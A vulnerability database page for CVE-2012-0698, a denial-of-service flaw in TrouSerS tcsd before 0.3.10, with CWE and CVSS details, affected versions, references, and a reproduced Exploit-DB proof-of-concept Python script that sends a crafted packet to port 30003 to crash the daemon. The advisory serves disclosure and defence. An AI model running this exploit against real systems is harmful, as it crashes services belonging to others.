CVE-2012-0698 : Detail

CVE-2012-0698

Overflow
18.87%V4
Network
2012-11-26
10h00 +00:00
2017-08-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

tcsd in TrouSerS before 0.3.10 allows remote attackers to cause a denial of service (daemon crash) via a crafted type_offset value in a TCP packet to port 30003.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 22904

Publication date : 2012-11-22 23h00 +00:00
Author : Andy Lutomirski
EDB Verified : No

# crash_tcsd.py # Copyright (c) 2012 Andy Lutomirski. All rights reserved. # # Permission is granted to anyone to copy and redistribute this file verbatim. # Permission is *not* granted to distribute modified copies or derivative works. import struct import socket import time # UnloadBlob_PCR_EVENT also appears buggy. crasher = struct.pack('>IIIIIII', 28, # packet_size = sizeof(tcsd_packet_hdr) 11, # ordinal: LoadKeyByBlob 1, # num_parms = 1 (so first getData doesn't bail) 0, # type_size = 0 0x80000000, # type_offset is off in lala land 0, # parm_size = 0 (skip checking) 28, # parm_offset: see getTCSDPacket ) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP) s.connect(('127.0.0.1', 30003)) s.send(crasher) s.shutdown(socket.SHUT_WR) s.close()

Products Mentioned

Configuraton 0

Trustedcomputinggroup>>Trousers >> Version To (including) 0.3.9

Trustedcomputinggroup>>Trousers >> Version 0.2.8

Trustedcomputinggroup>>Trousers >> Version 0.2.9

Trustedcomputinggroup>>Trousers >> Version 0.2.9.1

Trustedcomputinggroup>>Trousers >> Version 0.2.9.2

Trustedcomputinggroup>>Trousers >> Version 0.3.0

Trustedcomputinggroup>>Trousers >> Version 0.3.1

Trustedcomputinggroup>>Trousers >> Version 0.3.2

Trustedcomputinggroup>>Trousers >> Version 0.3.3

Trustedcomputinggroup>>Trousers >> Version 0.3.4

Trustedcomputinggroup>>Trousers >> Version 0.3.5

Trustedcomputinggroup>>Trousers >> Version 0.3.6

Trustedcomputinggroup>>Trousers >> Version 0.3.7

Trustedcomputinggroup>>Trousers >> Version 0.3.8

References

http://www.debian.org/security/2012/dsa-2576
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.exploit-db.com/exploits/22904/
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/51295
Tags : third-party-advisory, x_refsource_SECUNIA